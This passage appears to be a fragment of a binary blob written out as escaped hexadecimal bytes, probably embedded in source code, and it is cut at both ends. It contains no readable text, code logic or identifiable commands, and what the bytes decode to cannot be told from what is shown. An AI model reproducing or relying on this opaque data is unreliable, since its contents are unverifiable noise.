\xbb\\xce\\x76\\x15\\x2a\\x68\\xd8\\x05\\\n\\x01\\x10\\x00\\x01\\x10\\x00\\x01\\xb1\\x09\\x90\\x26\\xfe\\xba\\xa5\\x7a\\x6a\\\n\\xbc\\x50\\xe5\\x0a\\x26\\xe8\\xcc\\xe1\\x3a\\x13\\x56\\x0b\\xf6\\x24\\x22\\x14\\\n\\x10\\xd8\\x05\\x01\\x10\\x00\\x01\\x10\\x00\\x01\\x21\\x08\\x90\\x26\\x0a\\x3a\\\n\\x14\\x2d\\xa8\\xa0\\xd3\\x0e\\x38\\x87\\xd8\\xe2\\x79\\x21\\xc0\\xc0\\x26\\x08\\\n\\x80\\x00\\x08\\x80\\x00\\x08\\x28\\x85\\x00\\x69\\xe1\\x16\\xd2\\x44\\x41\\x77\\\n\\x7a\\x14\\x54\\xd0\\x19\\xe8\\x06\\x53\\x7e\\x9b\\xa3\\x14\\xe0\\xf0\\x13\\x04\\\n\\x40\\x00\\x04\\x40\\x00\\x04\\x84\\x20\\x40\\x5a\\xf8\\xa9\\x10\\x76\\x4b\\xdb\\\n\\x14\\x5c\\xd0\\xf7\\x76\\x3e\\xb1\\x93\\x9e\\x4c\\x22\\x85\\x0e\\x04\\xf6\\x41\\\n\\x00\\x04\\x40\\x00\\x04\\x40\\x40\\x8e\\x04\\x48\\x03\\x37\\x93\\x16\\x0a\\xae\\\n\\x83\\x82\\x0b\\xba\\xa9\\x95\\xfe\\xa1\\x1c\\x21\\xc3\\x27\\x10\\x00\\x01\\x10\\\n\\x00\\x01\\x10\\x10\\x9a\\x40\\x83\\x69\\xbf\\xfe\\x57\\xe8\\x32\\x98\\x7d\\x51\\\n\\x04\\xdd\\x3f\\xdc\\xd8\\x4a\\xdf\\x26\\x46\\x40\\x28\\x03\\x04\\x40\\x00\\x04\\\n\\x40\\x00\\x04\\xe4\\x42\\xa0\\x5a\\xff\\xa8\\x15\\x7b\\x3b\\x9d\\xdc\\x21\\x86\\\n\\x3f\\xa2\\x08\\xfa\\x5a\\xbd\\xce\\x40\\xe3\\x07\\xb3\\x75\\xfa\\xd2\\xa7\\x44\\\n\\x8a\\x11\\x1e\\xca\\x00\\x01\\x10\\x00\\x01\\x10\\x00\\x01\\xe9\\x08\\x34\\x9c\\\n\\xfa\\xdb\\x47\\x62\\x95\\x2e\\x8a\\xa0\\xb3\\x60\\xd8\\x58\\x7a\\xb5\\x7e\\x07\\\n\\x70\\x0a\\x9b\\x58\\x35\\x8b\\x72\\x40\\x00\\x04\\x40\\x00\\x04\\x24\\x25\\xc0\\\n\\x5a\\xe7\\x3b\\x9a\\x5d\\x3e\\x2a\\x96\\x13\\xa2\\x09\\x3a\\x0b\\xa8\\xc1\\xe4\\\n\\x3f\\x3e\\x40\\x2b\\x5d\\xac\\xaa\\x45\\x39\\x20\\x00\\x02\\x20\\x00\\x02\\x52\\\n\\x12\\xa0\\xd6\\xb9\\xa8\\xf3\\xc7\\x44\\x15\\xf4\\x9d\\x2d\\x2e\\x1e\\xa7\\x56\\\n\\xfa\\x4a\\x29\\x01\\xa3\\x6c\\x10\\x00\\x01\\x10\\x00\\x01\\x10\\x10\\x9a\\x00\\\n\\xb5\\xce\\x57\\x52\\xeb\\xfc\\x98\\xd0\\xe5\\x94\\xb6\\x2f\\xaa\\xa0\\x9b\\x5a\\\n\\xe9\\x73\\xd0\\x4a\\x17\\xb3\\x8a\\x51\\x16\\x08\\x80\\x00\\x08\\x80\\x80\\xd8\\\n\\x04\\xc4\\x1c\\x3b\\x37\\xc7\\x26\\xba\\xa0\\x53\\x2b\\x3d\\x86\\x5a\\xe9\\x2b\\\n\\xc4\\x86\\x8b\\xf2\\x40\\x00\\x04\\x40\\x00\\x04\\x40\\x40\\x0c\\x02\\xa6\\xb1\\\n\\xf3\\x68\\x31\\xca\\x92\\xb4\\x85\\xce\\x0a\\x6f\\xf4\\xfa\\xb2\\x99\\x7a\\x47\\\n\\xde\\xcf\\x76\\x17\\x9b\\x1d\\xca\\x03\\x01\\x10\\x00\\x01\\x10\\x00\\x81\\x7b\\\n\\x08\\x30\\x6d\\x23\\x8d\\x7b\\x5f\\x0a\\x2c\\xa2\\xb7\\xd0\\x59\\x90\\xdb\\x1b\\\n\\x5d\\x3d\\x13\\xf2\\x68\\xc4\\x77\\x52\\x04\\x8c\\x32\\x41\\x00\\x04\\x40\\x00\\\n\\x04\\x40\\x40\\x28\\x02\\x4c\\xdb\\x48\\xe3\\x4e\\x0a\\x65\\xbf\\x32\\xbb\\x92\\\n\\x08\\x3a\\x73\\xa8\\xe1\\xf4\\x5f\\xdf\\x71\\xf2\\xca\\xcd\\x93\\x22\\x68\\x94\\\n\\x09\\x02\\x20\\x00\\x02\\x20\\x00\\x02\\x7c\\x13\\x70\\xf2\\xcc\\x2b\\x20\\x6d\\\n\\x7b\\x8f\\x6f\\xbb\\x5c\\xed\\x49\\x26\\xe8\\x11\\x01\\x19\\x69\\xf5\\x5e\\x5a\\\n\\x8e\\x83\\x5b\\xb8\\xd6\\x14\\xd2\\x81\\x00\\x08\\x80\\x00\\x08\\xc8\\x9a\\x40\\\n\\xbd\\x97\\xff\\x7e\\x9f\\xb4\\x2d\\x59\\x2a\\x27\\x25\\x13\\x74\\x16\\x70\\xe8\\\n\\x84\\x55\\xf3\\xdd\\x6b\\x26\\x5f\\x91\\x2a\\x78\\x94\\x0b\\x02\\x20\\x00\\x02\\\n\\x20\\x00\\x02\\x7c\\x10\\x70\\xab\\x91\\x72\\x85\\x34\\xed\\x73\\x3e\\x6c\\xd9\\\n\\x6a\\x43\\x52\\x41\\x5f\\xef\\x5a\\x98\\xdf\\x68\\xc6\\xcf\\x6f\\xdb\\xea\\x3c\\\n\\xf2\\x81\\x00\\x08\\x80\\x00\\x08\\x80\\x80\\x1c\\x08\\x34\\x7e\\xf3\\xa7\\x77\\\n\\x99\\xa6\\x49\\xe9\\x8b\\xa4\\x82\\xce\\x02\\x3f\\x3c\\x62\\xd7\\x6f\\x7e\\x6d\\\n\\x63\\xf7\\x48\\x09\\x01\\x65\\x83\\x00\\x08\\x80\\x00\\x08\\x80\\x80\\xad\\x04\\\n\\xfc\\xda\\x9c\\xdd\\x55\\x7d\\xf8\\xae\\x5f\\x6d\\xcd\\xcf\\x57\\x3e\\xc9\\x05\\\n\\x9d\\x05\\xd2\\x64\\xe6\\xa2\\x19\\x7c\\x05\\x04\\x3b\\x20\\x00\\x02\\x20\\x00\\\n\\x02\\x20\\x20\\x16\\x01\\xb6\\x4c\\xad\\xc9\\x7b\\x0b\\xdf\\x64\\x87\\x90\\x89\\\n\\x55\\x66\\x45\\xe5\\xc8\\x42\\xd0\\x77\\x87\\xc5\\xee\\xad\\x3e\\x6c\\xf7\\xef\\\n\\x52\\xc3\\x40\\xf9\\x20\\x00\\x02\\x20\\x00\\x02\\x20\\x60\\x0d\\x01\\x5a\\xa6\\\n\\xf6\\xed\\xee\\xb6\\x67\\xf7\\x59\\x93\\x47\\xa8\\xb4\\xb2\\x10\\x74\\x16\\x5c\\\n\\xa3\\x37\\x7f\\x7a\\xcd\\xc1\\xa5\\x50\\xa8\\x38\\x61\\x17\\x04\\x40\\x00\\x04\\\n\\x40\\x00\\x04\\x78\\x25\\x20\\xf5\\x32\\xb5\\xb2\\xc1\\xc8\\x46\\xd0\\x23\\x43\\\n\\x92\\xaf\\x87\\x4e\\x58\\xfd\\x09\\xaf\\xb4\\x61\\x0c\\x04\\x40\\x00\\x04\\x40\\\n\\x00\\x04\\x04\\x22\\x40\\xcb\\xd4\\xde\\xa3\\x65\\x6a\\x29\\x02\\x99\\xb7\\xda\\\n\\xac\\x6c\\x04\\x9d\\x79\\xde\\x60\\xca\\x6f\\xef\\x79\\xd6\\x4b\\x38\\x63\\x75\\\n\\x14\\xc8\\x00\\x02\\x20\\x00\\x02\\x20\\x00\\x02\\x22\\x12\\xf0\\xa8\\x7b\\x3d\\\n\\x36\\x74\\xe2\\xbf\\xf3\\x44\\x2c\\xd2\\x62\\x51\\xb2\\x12\\x74\\x36\\xe5\\xbf\\\n\\xf9\\x47\\xdf\\xbc\\x6c\\xd1\\x6b\\x24\\x00\\x01\\x10\\x00\\x01\\x10\\x00\\x01\\\n\\x09\\x09\\xb4\\xf8\\x64\\xc1\\xcb\\xeb\\x5d\\x8a\\x0a\\x24\\x74\\xe1\\xbe\\xa2\\\n\\x65\\x25\\xe8\\xcc\\xbb\\xbd\\x9d\\x4f\\x6c\\xab\\x39\\x6a\\xeb\\x62\\x39\\x41\\\n\\x82\\x2f\\x20\\x00\\x02\\x20\\x00\\x02\\x20\\x60\\x26\\x40\\x1a\\xb5\\x68\\x6f\\\n\\xa7\\x93\\x5b\\xe5\\x46\\x44\\x76\\x82\\xce\\x00\\x35\\x79\\x67\\xd1\\xeb\\xce\\\n\\x55\\xb2\\x24\\x5d\\xa0\\x2f\\xb7\\x8a\\x82\\x3f\\x20\\x00\\x02\\x20\\x00\\x02\\\n\\xd2\\x13\\x20\\x6d\\xca\\x20\\x8d\\x7a\\x53\\x7a\\x4f\\xee\\xf7\\x40\\x96\\x82\\\n\\xbe\\xc9\\x3f\\x2b\\xad\\xc9\\xdb\\x8b\\x27\\xc9\\x11\\x18\\x7c\\x02\\x01\\x10\\\n\\x00\\x01\\x10\\xd0\\x2e\\x01\\xd2\\xa6\\xd7\\x49\\xa3\\x6e\\xca\\x91\\x80\\x2c\\\n\\x05\\x9d\\x81\\x8a\\x7e\\x38\\x72\\x91\\x7f\\xf8\\x89\\x2d\\x72\\x84\\x06\\x9f\\\n\\x40\\x00\\x04\\x40\\x00\\x04\\xb4\\x47\\xa0\\x6a\\xdf\\x83\\xff\\x90\\x36\\x2d\\\n\\x94\\x6b\\xe4\\xb2\\x15\\x74\\x06\\x8c\\x26\\xc8\\x4d\\x72\\xf4\\x44\\xcf\\xbb\\\n\\x5c\\x2f\\x1e\\xf8\\x05\\x02\\x20\\x00\\x02\\x5a\\x21\\x40\\x5a\\x54\\xdc\\xfc\\\n\\xc3\\x6f\\x26\\xcb\\x39\\x5e\\x59\\x0b\\xfa\\xb6\\xfa\\x09\\x67\\x1b\\x4e\\xfb\\\n\\x65\\x9a\\x9c\\x01\\xc2\\x37\\x10\\x00\\x01\\x10\\x00\\x01\\xf5\\x13\\x20\\x2d\\\n\\x9a\\xb1\\xa5\\x7a\\x6a\\xbc\\x9c\\x23\\x95\\xb5\\xa0\\x33\\x70\\x75\\xc6\\xad\\\n\\xfd\\xd2\\xa7\\xe5\\x85\\x03\\x72\\x86\\x08\\xdf\\x40\\x00\\x04\\x40\\x00\\x04\\\n\\xd4\\x4b\\xc0\\xa7\\xf9\\xc5\\x7d\\xa4\\x45\\x5f\\xc8\\x3d\\x42\\xd9\\x0b\\xfa\\\n\\x3a\\xa7\\x92\\xe2\\x16\\x1f\\x7d\\xfd\\x32\\xdb\\x00\\x1f\\x3f\\x20\\x00\\x02\\\n\\x20\\x00\\x02\\x20\\x20\\x26\\x01\\xa6\\x3d\\x2d\\x3e\\x5d\\xf0\\x0a\\x69\\x51\\\n\\x91\\x98\\xe5\\xda\\x52\\x96\\xec\\x05\\x9d\\x05\\xb5\\xb3\\xd5\\x85\\xc3\\x75\\\n\\x9f\\xfd\\x67\\xae\\x2d\\x01\\x22\\x0f\\x08\\x80\\x00\\x08\\x80\\x00\\x08\\xd8\\\n\\x4a\\x80\\xb4\\xe7\\xe3\\x9d\\x2d\\x2e\\x1e\\xb1\\x35\\xbf\\x98\\xf9\\x14\\x21\\\n\\xe8\\x0c\\x48\\x83\\xa9\\xbf\\xbe\\x8d\\x73\\xd3\\xc5\\xbc\\x34\\x50\\x16\\x08\\\n\\x80\\x00\\x08\\x68\\x9b\\x00\\x3b\\xe7\\x9c\\xb4\\x67\\x96\\x52\\x28\\xe8\\x95\\\n\\xe2\\x28\\xf3\\xb3\\xef\\x95\\xe0\\x06\\x7b\\x07\\x7d\\x7d\\xbe\\x38\\xd7\\x4d\\\n\\x49\\x6e\\xc3\\x57\\x10\\x00\\x01\\x10\\x00\\x01\\x85\\x11\\x70\\xf4\\xc8\\x37\\\n\\x74\\x8b\\x78\\xa9\\x61\\x64\\xed\\xa4\\x8b\\x4a\\x71\\x5d\\x31\\x2d\\x74\\x06\\\n\\x74\\x6b\\x9d\\xc4\\x0b\\xb4\\xa8\\xff\\x15\\xa5\\xc0\\x85\\x9f\\x20\\x00\\x02\\\n\\x20\\x00\\x02\\xca\\x24\\x40\\x5a\\xf3\\xaa\\x92\\xc4\\x9c\\x51\\x56\\x94\\xa0\\\n\\x33\\x87\\x8f\\x3d\\xb9\\xf1\\xab\\xc0\\xee\\x47\\x37\\x2a\\xf3\\x12\\x81\\xd7\\\n\\x20\\x00\\x02\\x20\\x00\\x02\\x72\\x27\\x10\\x34\\x78\\xef\\x1f\\x4c\\x6b\\xe4\\\n\\xee\\x67\\x59\\xff\\x14\\x27\\xe8\\x2c\\x80\\x96\\xf3\\xe6\\x3f\\xed\\x5a\\x2d\\\n\\x4d\\x96\\x5b\\xef\\x29\\xed\\x02\\x80\\xbf\\x20\\x00\\x02\\x20\\x00\\x02\\xff\\\n\\x27\\xe0\\x5a\\xf5\\xd6\\x8d\\x16\\x1f\\x7f\\xf5\\x92\\x12\\x99\\x28\\x52\\xd0\\\n\\x37\\x07\\xa5\\x25\\x93\\xa8\\x8f\\x55\\x22\\x70\\xf8\\x0c\\x02\\x20\\x00\\x02\\\n\\x20\\x20\\x5f\\x02\\xad\\xe6\\xcf\\x1b\\xbf\\xc9\\x2f\\xfb\\x96\\x7c\\x3d\\xac\\\n\\xd8\\x33\\x45\\x0a\\x3a\\x0b\\x67\\x7f\\x8f\\xa3\\x1b\\x6b\\x8d\\xd9\\xf8\\x9d\\\n\\x12\\xa1\\xc3\\x67\\x10\\x00\\x01\\x10\\x00\\x01\\xf9\\x11\\x20\\x4d\\xf9\\x66\\\n\\x5f\\xf7\\x63\\x9b\\xe4\\xe7\\x19\\x37\\x8f\\x14\\x2b\\xe8\\x2c\\xbc\\x26\\xef\\\n\\x2c\\x7e\\xcd\\xa3\\x76\\xe2\\x39\\x6e\\xa1\\x22\\x15\\x08\\x80\\x00\\x08\\x80\\\n\\x00\\x08\\x94\\x4f\\xc0\\xab\\xf1\\x95\\xa3\\xa4\\x29\\x6f\\x28\\x99\\x8f\\xa2\\\n\\x05\\x7d\\x83\\x67\\x7e\\x4e\\xab\\x2f\\xe7\\x8e\\x75\\x70\\x96\\xfd\\x06\\x3e\\\n\\x4a\\xbe\\x46\\xe0\\x3b\\x08\\x80\\x00\\x08\\xa8\\x9a\\x00\\xd3\\x90\\x36\\x0b\\\n\\x3e\\x1d\\xcf\\x34\\x45\\xc9\\x81\\x2a\\x5a\\xd0\\x19\\xf8\\xdd\\x61\\xb1\\x07\\\n\\x1a\\xbd\\xf9\\x13\\x0e\\x70\\x51\\xf2\\x55\\x08\\xdf\\x41\\x00\\x04\\x40\\x40\\\n\\x42\\x02\\xa4\\x21\\xaf\\x6f\\x6f\\x72\\xe5\\x98\\x84\\x2e\\xf0\\x52\\xb4\\xe2\\\n\\x05\\x9d\\x51\\x38\\x31\\x61\\xf5\\xe7\\x35\\x1e\\xdc\\xbe\\x84\\x17\\x22\\x30\\\n\\x02\\x02\\x20\\x00\\x02\\x20\\xa0\\x19\\x02\\xd5\\x47\\xee\\x58\\x4a\\x1a\\xf2\\\n\\x99\\x1a\\x02\\x56\\x85\\xa0\\xb3\\x8a\\x68\\xfe\\xd1\\xd7\\x2f\\x79\\x35\\x88\\\n\\x3f\\xa1\\x86\\x4a\\x41\\x0c\\x20\\x00\\x02\\x20\\x00\\x02\\xc2\\x13\\xf0\\xac\\\n\\x9f\\x10\\x43\\x4b\\xd4\\x5e\\x14\\xbe\\x24\\x71\\x4a\\x50\\x8d\\xa0\\x6f\\xf0\\\n\\xb8\\x9d\\xdf\\xe6\\xfb\\x8f\\x1e\\x73\\xf6\\xc9\\x29\\x14\\x07\\x1d\\x4a\\x01\\\n\\x01\\x10\\x00\\x01\\x10\\x50\\x2a\\x01\\x27\\xef\\x9c\\x9c\\xb0\\x85\\x1f\\x3c\\\n\\x4e\\xda\\x91\\xab\\xd4\\x18\\xca\\xfa\\xad\\x1a\\x41\\x67\\x81\\x6d\\x6f\\x18\\\n\\x7f\\xba\\xe5\\xe7\\xf3\\x1e\\x53\\x4b\\xe5\\x20\\x0e\\x10\\x00\\x01\\x10\\x00\\\n\\x01\\x61\\x08\\xb4\\xfe\\x72\\xee\\x13\\xdb\\x1a\\x24\\x9c\\x11\\xc6\\xba\\x34\\\n\\x56\\x55\\x25\\xe8\\x0c\\xe1\\x81\\xfe\\x07\\xff\\xa9\\xf7\\xc2\\x8a\\x8f\\xa5\\\n\\xc1\\x89\\x52\\x41\\x00\\x04\\x40\\x00\\x04\\xe4\\x4e\\x80\\x34\\xe2\\x93\\xa8\\\n\\xbe\\x87\\x56\\xcb\\xdd\\x4f\\x6b\\xfd\\x53\\x9d\\xa0\\x33\\x00\\x0d\\x5f\\x5b\\\n\\xfa\\x8e\\x7f\\xf8\\x89\\xcd\\xd6\\xc2\\x40\\x7a\\x10\\x00\\x01\\x10\\x00\\x01\\\n\\x75\\x13\\xf0\\xef\\x78\\x72\\x2b\\x69\\xc4\\x5b\\x6a\\x8c\\x52\\x51\\xc7\\xa7\\\n\\x5a\\x53\\x01\\x03\\x53\\xfc\\xaa\\xee\\x19\\xf4\\xf5\\x89\\x82\\x9b\\x7e\\x41\\\n\\xd6\\xe4\\x43\\x5a\\x10\\x00\\x01\\x10\\x00\\x01\\x75\\x12\\x70\\xab\\x91\\x12\\\n\\xdf\\x65\\xed\\x94\\x0e\\x11\\x81\\xe9\\x49\\x6a\\x8c\\x50\\x95\\x2d\\x74\\x56\\\n\\x51\\x11\\x55\\xd3\\x53\\xda\\x7c\\xfd\\xc9\\x18\\xbd\\x13\\x36\\x9d\\x51\\xe3\\\n\\x85\\x8b\\x98\\x40\\x00\\x04\\x40\\xc0\\x1a\\x02\\x4c\\x0b\\x68\\x12\\xdc\\x68\\\n\\xb5\\x8a\\x39\\x63\\xa1\\x5a\\x41\\x67\\xc1\\xed\\xed\\x7c\\x62\\x5b\\xe3\\xb7\\\n\\x7e\\x9a\\x6a\\x4d\\xa5\\x23\\x2d\\x08\\x80\\x00\\x08\\x80\\x80\\xfa\\x08\\x34\\\n\\x7b\\xff\\x87\\x57\\x77\\xb6\\xbc\\x78\\x50\\x7d\\x91\\xfd\\x3f\\x22\\x55\\x0b\\\n\\x3a\\x0b\\x93\\x36\\x0c\\x98\\x4f\\x1b\\xee\\x2b\\xee\\x5c\\x5b\\x35\\x5f\\x74\\\n\\x88\\x0d\\x04\\x40\\x00\\x04\\xc4\\x24\\x40\\x1a\\xf0\\x2d\\x9d\\x6f\\xbe\\x40\\\n\\xcc\\x32\\xa5\\x28\\x4b\\xf5\\x82\\xce\\xa0\\x36\\x9b\\xfd\\xc3\\xb4\\x80\\xee\\\n\\x47\\xd7\\x4b\\x01\\x18\\x65\\x82\\x00\\x08\\x80\\x00\\x08\\x48\\x47\\x20\\xa0\\\n\\xdb\\xb1\\x0d\\xa4\\x01\\x93\\xa5\\xf3\\x40\\xbc\\x92\\x55\\x3b\\x29\\xae\\x2c\\\n\\xc2\\xc1\\x59\\x1e\\x5e\\x07\\x46\\x7f\\xba\\x33\\x2b\\x36\\x34\\x4c\\x3c\\xbc\\\n\\x28\\x09\\x04\\x40\\x00\\x04\\x40\\x40\\x2a\\x02\\xde\\x4d\\xe2\\x0e\\x77\\x5a\\\n\\xf1\\x7a\\xdf\\x8d\\xde\\xb9\\x99\\x52\\xf9\\x20\\x66\\xb9\\x9a\\x11\\x74\\x06\\\n\\xb5\\xff\\xf5\\xc0\\x9a\\x51\\x0f\\xcd\\x3d\\x94\\x7f\\x23\\xb0\\xba\\x98\\x90\\\n\\x51\\x16\\x08\\x80\\x00\\x08\\x80\\x80\\xb8\\x04\\xdc\\x82\\x53\\xaf\\x84\\xaf\\\n\\x9a\\xda\\x6d\\x4b\\xf5\\xd4\\x04\\x71\\x4b\\x96\\xae\\x34\\x4d\\x74\\xb9\\x9b\\\n\\xf1\\x6e\\xa9\\x71\\xf3\\x5a\\xbb\\x9f\\xde\\x1b\\xea\\xe4\\x95\\x6b\\x90\\x0e\\\n\\x39\\x4a\\x06\\x01\\x10\\x00\\x01\\x10\\x10\\x92\\x00\\xdd\\xe3\\xf3\\xda\\xfd\\\n\\x3c\\xeb\\x41\\x2d\\x89\\x39\\xe3\\xa9\\x29\\x41\\x67\\x01\\xef\\x68\\x1a\\x77\\\n\\xb4\\xed\\x77\\xff\\x1d\\x8e\\xe5\\x6c\\x42\\x7e\\x9d\\x60\\x1b\\x04\\x40\\x00\\\n\\x04\\xa4\\x21\\xc0\\xee\\xed\\x6d\\xbf\\xff\\x68\\x14\\xbb\\xd7\\x4b\\xe3\\x81\\\n\\x74\\xa5\\x6a\\x4e\\xd0\\x19\\xea\\x7d\\x3d\\x8e\\xae\\x67\\x4b\\x18\\xa4\\xc3\\\n\\x8e\\x92\\x41\\x00\\x04\\x40\\x00\\x04\\x84\\x20\\xd0\\xe2\\x93\\xaf\\x9e\\xdd\\\n\\xd7\\xfd\\xd8\\x46\\x21\\x6c\\xcb\\xdd\\xa6\\x26\\x05\\x9d\\x55\\x0a\\x5b\\xc2\\\n\\x50\\x67\\xfc\\x9a\\x2f\\xe5\\x5e\\x41\\xf0\\x0f\\x04\\x40\\x00\\x04\\x40\\x80\\\n\\x1b\\x01\\x76\\x8e\\x47\\xf4\\xe8\\xad\\x3f\\x72\\x4b\\xad\\xbe\\x54\\x9a\\x15\\\n\\x74\\x56\\x95\\x4d\\xde\\xf9\\x71\\x6a\\xd0\\xe0\\xbd\\xcb\\xd5\\x57\\xad\\x88\\\n\\x08\\x04\\x40\\x00\\x04\\xb4\\x45\\x20\\x68\\xe0\\xfe\\xbf\\x69\\x8f\\xf6\\xb7\\\n\\xb5\\x15\\xf5\\xbd\\xd1\\x3a\\x69\\x39\\xf8\\x75\\x8e\\x86\\x92\\xa1\\xf9\\xf3\\\n\\xc6\\x1e\\xcd\\x77\\x75\\x4f\\xd9\\xde\\x7e\\x98\\x96\\x59\\x20\\x76\\x10\\x00\\\n\\x01\\x10\\x50\\x2a\\x81\\xaa\\xbd\\x0f\\xaf\\x6e\\xbd\\xe0\\xb3\\xa7\\xd9\\x3d\\\n\\x5d\\xa9\\x31\\xf0\\xe1\\xb7\\xa6\\x96\\xad\\x55\\x04\\x6c\\x68\\xbe\\x8b\\xfb\\\n\\xe1\\xa7\\x66\\x6f\\x48\\x3b\\xd8\\xa2\\x17\\x1f\\x50\\x61\\x03\\x04\\x40\\x00\\\n\\x04\\x40\\x40\\x1c\\x02\\x74\\x7a\\xda\\xb6\\xf6\\xbf\\xcc\\x1c\\xb6\\xde\\xad\\\n\\x20\\x4f\\x9c\\x12\\xe5\\x5b\\x8a\\xa6\\xbb\\xdc\\xcd\\xd5\\xc2\\x2e\\x04\\x5a\\\n\\xce\\x36\\x82\\x2e\\x8c\\x1d\\xf2\\xad\\x2a\\x78\\x06\\x02\\x20\\x00\\x02\\x20\\\n\\x50\\x9a\\x00\\x3b\\x0a\\x95\\xee\\xdd\\x0f\\x40\\xcc\\xef\\x50\\x41\\x0b\\xbd\\\n\\xd4\\xd5\\x31\\x24\\xdb\\xcd\\xfb\\xc0\\x63\\x1f\\x6f\\xcb\\x3c\\xd1\\xa0\\x3d\\\n\\xbe\\x36\\x20\\x00\\x02\\x20\\x00\\x02\\xf2\\x25\\xe0\\xd3\\xf2\\xc2\\xc1\\x4e\\\n\\x7f\\xce\\xe8\\xb7\\xc1\\x2b\\x3f\\x4b\\xbe\\x5e\\x8a\\xeb\\x19\\x5a\\xe8\\xa5\\\n\\x78\\xb3\\x0b\\xa3\\xc3\\x2f\\xef\\x0e\\xf2\\x6a\\x10\\x7f\\x5a\\xdc\\x6a\\x40\\\n\\x69\\x20\\x00\\x02\\x20\\x00\\x02\\x5c\\x09\\x90\\x98\\x1f\\xa0\\x7b\\xf5\\x50\\\n\\x88\\xf9\\xbd\\xc4\\xd0\\x42\\x2f\\xe7\\x0a\\x1a\\x90\\xe4\\x5f\\xe3\\xd0\\x98\\\n\\x0f\\x23\\xb3\\x2f\\xd4\\x6a\\xca\\xf5\\x02\\x43\\x3a\\x10\\x00\\x01\\x10\\x00\\\n\\x01\\xe1\\x09\\x50\\x83\\xeb\\x24\\xed\\xcf\\xde\\x7b\\x53\\x95\\xac\\x9b\\xc2\\\n\\x97\\xa6\\xac\\x12\\x20\\xe8\\x15\\xd4\\x17\\x89\\x7a\\xf5\\xa8\\x51\\x9f\\xed\\\n\\xcb\\x8b\\x0f\\x0a\\x55\\x56\\x95\\xc2\\x5b\\x10\\x00\\x01\\x10\\x50\\x27\\x01\\\n\\x12\\xf3\\x13\\x1d\\x7e\\x7f\\x7b\\xf0\\xe6\\xa0\\xb4\\x6b\\xea\\x8c\\xd0\\xbe\\\n\\xa8\\x20\\xe8\\x95\\xf0\\xeb\\x77\\x35\\xa8\\xfe\\xc1\\x31\\x1f\\x45\\x42\\xd4\\\n\\xed\\xbb\\xc8\\x90\\x1b\\x04\\x40\\x00\\x04\\xec\\x25\\xe0\\x5e\\x2b\\xe9\\x72\\\n\\xf8\\xca\\xd7\\xba\\x43\\xcc\\x2b\\x26\\x09\\x41\\xb7\\x70\\x95\\x91\\xa8\\xd7\\\n\\xa5\\x96\\x7a\\xf4\\xed\\x64\\x7f\\x3f\\x7b\\x2f\\x48\\xe4\\x07\\x01\\x10\\x00\\\n\\x01\\x10\\xb0\\x9e\\x00\\x89\\xf9\\x95\\x8e\\xbf\\xbf\\xd5\\x2f\\xb2\\x76\\xd2\\\n\\x05\\xeb\\x73\\x6b\\x27\\x07\\x26\\xc5\\x59\\xa8\\x6b\\xba\\x80\\x2e\\x77\\x5e\\\n\\x35\\xad\\xad\\x47\\xdd\\xeb\\xe7\\xb5\\x73\\x59\\x20\\x52\\x10\\x00\\x01\\x10\\\n\\x90\\x07\\x01\\xba\\xf7\\x9e\\xed\\xf4\\xd7\\x8c\\x5e\\x10\\x73\\xcb\\xf5\\x81\\\n\\x16\\xba\\x65\\x46\\xc6\\x14\\x03\\x6f\\xfa\\x05\\x45\\x8d\\xfe\\x74\\x57\\xee\\\n\\xe5\\x1a\\x8d\\x38\\x66\\x41\\x32\\x10\\x00\\x01\\x10\\x00\\x01\\x3b\\x08\\x90\\\n\\x98\\xc7\\x86\\xd3\\x04\\xb8\\x88\\xc0\\xf4\\x44\\x3b\\xcc\\x68\\x26\\x2b\\x5a\\\n\\xe8\\x1c\\xab\\x9a\\x2e\\xa8\\x24\\xba\\xb0\\x7a\\x78\\x37\\x89\\x3b\\xce\\x31\\\n\\x0b\\x92\\x81\\x00\\x08\\x80\\x00\\x08\\xd8\\x48\\x80\\xee\\xb5\\xc7\\xe8\\x9e\\\n\\xdb\\x0b\\x62\\xce\\x1d\\x20\\x04\\x9d\\x3b\\x2b\\x1d\\x13\\xf5\\x8e\\x7f\\xbf\\\n\\xd1\\xcb\\xaf\\x6d\\xec\\x7e\\x2b\\xb2\\x21\\x29\\x08\\x80\\x00\\x08\\x80\\x80\\\n\\x15\\x04\\xe8\\x1e\\xbb\\x87\\xee\\xb5\\x7d\\xd8\\x3d\\xd7\\x8a\\x6c\\x9a\\x4f\\\n\\x0a\\x41\\xb7\\xf2\\x12\\xd8\\xe4\\x9b\\x73\\xab\\xc3\\x6f\\xef\\x0c\\x08\\xe8\\\n\\x1a\\x13\\x69\\x65\\x56\\x24\\x07\\x01\\x10\\x00\\x01\\x10\\xb0\\x40\\x80\\xee\\\n\\xad\\x9b\\xe9\\x1e\\x3b\\x98\\xdd\\x6b\\x01\\xcb\\x3a\\x02\\x10\\x74\\xeb\\x78\\\n\\x19\\x53\\x6f\\xf0\\xcc\\xcf\\xa6\\xfd\\x83\\x87\\x55\\xeb\\x1f\\xf5\\xaf\\x0d\\\n\\xd9\\x91\\x05\\x04\\x40\\x00\\x04\\x40\\xa0\\x1c\\x02\\x74\\x4f\\xfd\\x87\\xee\\\n\\xad\\x23\\xd9\\x3d\\x16\\x80\\xac\\x27\\x80\\x49\\x71\\xd6\\x33\\xbb\\x9b\\x63\\\n\\x58\\xa1\\xa3\\xf3\\xd1\\x17\\xde\\xfc\\x3b\\x79\\x4b\\xf8\\x03\\x76\\x98\\x41\\\n\\x56\\x10\\x00\\x01\\x10\\xd0\\x3c\\x81\\x1a\\x0f\\xec\\x58\\xda\\x72\\xee\\xfc\\\n\\x89\\xeb\\x9c\\x8b\\x8b\\x34\\x0f\\xc3\\x46\\x00\\x68\\xa1\\xdb\\x08\\x8e\\x65\\\n\\xa3\\x0b\\xaf\\xb0\\xed\\x77\\xff\\x7d\\x84\\x2e\\xc4\\x5f\\xed\\x30\\x83\\xac\\\n\\x20\\x00\\x02\\x20\\xa0\\x69\\x02\\x4c\\xcc\\x5b\\xcd\\x9f\\x37\\x1e\\x62\\x6e\\\n\\xdf\\x65\\x80\\x16\\xba\\x7d\\xfc\\x8c\\xb9\\x87\\x97\\xe8\\xf5\\x17\\xbe\\x18\\\n\\xf3\\xc1\\x85\\x2f\\x1f\\x7f\\x8b\\x07\\x73\\x30\\x01\\x02\\x20\\x00\\x02\\x9a\\\n\\x21\\x50\\xef\\xa5\\xbf\\x3f\\x6e\\x34\\xfd\\x97\\xb7\\xd6\\x3a\\x18\\x0c\\x9a\\\n\\x09\\x5a\\xa0\\x40\\x21\\xe8\\x3c\\x82\\x6d\\xfb\\x57\\xff\\x17\\x4e\\xbd\\x39\\\n\\xe9\\x5b\\x43\\